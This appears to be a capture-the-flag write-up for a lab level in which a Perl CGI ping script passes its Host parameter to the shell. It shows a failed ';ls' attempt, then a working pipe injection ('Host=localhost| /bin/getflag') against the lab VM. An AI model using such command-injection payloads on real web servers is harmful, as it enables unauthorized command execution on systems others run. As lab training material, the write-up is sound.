The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07 . Files for this level can be found in /home/flag07.
This one was a little bit tricky since it’s specific to Perl. However I did remember about thisand upon refreshing my memory on the topic it was matter of seconds.
To play with this level just navigate to the IP of your VM at port 7007 (via providedthttpd.conf; in my case 192.168.1.11).
My first thought was to try using ";" to break ping command:
http://192.168.1.11:7007/index.cgi?Host=localhost;ls
But the result was:
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_req=1 ttl=64 time=0.063 ms
64 bytes from localhost (127.0.0.1): icmp_req=2 ttl=64 time=0.074 ms
64 bytes from localhost (127.0.0.1): icmp_req=3 ttl=64 time=0.148 ms
--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.063/0.095/0.148/0.037 ms
So clearly it didn’t work as I planned. Then I was trying to remind myself anything specific about Perl CGI scripts and I did that successfully (vide link from above). After quick refresh I already knew the answer. The pipes, the pipes!
http://192.168.1.11:7007/index.cgi?Host=localhost| /bin/getflag
And as you may expect it did work:
You have successfully executed getflag on a target account
On to the next one, gents!
594
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
